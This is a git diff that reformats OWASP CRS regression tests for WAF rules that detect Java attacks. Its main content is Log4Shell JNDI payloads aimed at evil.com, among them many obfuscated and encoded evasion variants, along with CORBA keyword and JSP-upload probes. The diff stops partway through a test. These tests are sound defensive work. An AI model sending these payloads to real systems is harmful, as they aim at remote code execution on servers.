+ - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_id: 415 desc: "Nested XML element value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-416 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_id: 416 desc: "Content-Type text/plain includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-417 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_id: 417 desc: "Content-Type application/json arg value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"org.omg.CORBA\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-418 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"org.omg.CORBA\"}" + output: + log_contains: "id \"944130\"" + - test_id: 418 desc: "Content-Type application/json arg name includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"org.omg.CORBA\": \"test\"}" - output: - log_contains: "id \"944130\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"org.omg.CORBA\": \"test\"}" + output: + log_contains: "id \"944130\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml index d380970c8..e53d52a3d 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml @@ -2,158 +2,147 @@ meta: author: "lifeforms, azurit" description: None - enabled: true - name: 944140.yaml tests: - - test_title: 944140-1 + - test_id: 1 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "944140" - - test_title: 944140-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "944140" + - test_id: 2 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-Filename: a.jsp - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload1" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jsp + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload1" + version: "HTTP/1.1" + output: + log_contains: id "944140" + - test_id: 3 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X_Filename: B.jsp - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload2" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X_Filename: B.jsp + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload2" + version: "HTTP/1.1" + output: + log_contains: id "944140" + - test_id: 4 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-File-Name: a.jspx - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload3" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: a.jspx + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload3" + version: "HTTP/1.1" + output: + log_contains: id "944140" + - test_id: 5 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-Filename: a.jsp.. - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload4" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jsp.. + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload4" + version: "HTTP/1.1" + output: + log_contains: id "944140" + - test_id: 6 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-Filename: a.jspx.. - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jspx.. + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload" + version: "HTTP/1.1" + output: + log_contains: id "944140" + - test_id: 7 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-File-Name: foo.jspx... - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: foo.jspx... + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload" + version: "HTTP/1.1" + output: + log_contains: id "944140" + - test_id: 8 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X_Filename: foo.jspx. - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload7" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X_Filename: foo.jspx. + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload7" + version: "HTTP/1.1" + output: + log_contains: id "944140" + - test_id: 9 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-File-Name: foo.html - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload8" - version: "HTTP/1.1" - output: - no_log_contains: id "944140" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: foo.html + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload8" + version: "HTTP/1.1" + output: + no_log_contains: id "944140" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml index 8e081afde..1042f5a4e 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml @@ -3,436 +3,411 @@ # 944151 should detect the same things as 944150. meta: author: "dune73, Max Leske, azurit" - enabled: true - name: "944150.yaml" description: "Description" +rule_id: 944150 tests: - - test_title: 944150-1 + - test_id: 1 desc: Log4J exploit on arg foo stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${jndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-2 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${jndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 2 desc: Log4J exploit on User-Agent stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-3 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 3 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-4 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 4 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: "${jndi:ldap://evil.com/webshell}" - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-5 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: "${jndi:ldap://evil.com/webshell}" + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$\u007Bjndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-10 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-11 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-12 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-13 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-14 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 14 desc: Log4J exploit on JSON with numeric HTML entity evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-15 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-16 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-17 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-18 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-19 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-20 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-21 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-22 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-23 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: '${jndi:ldap://evil.om/w}' - Content-Type: text/html - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-24 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" + - input: + 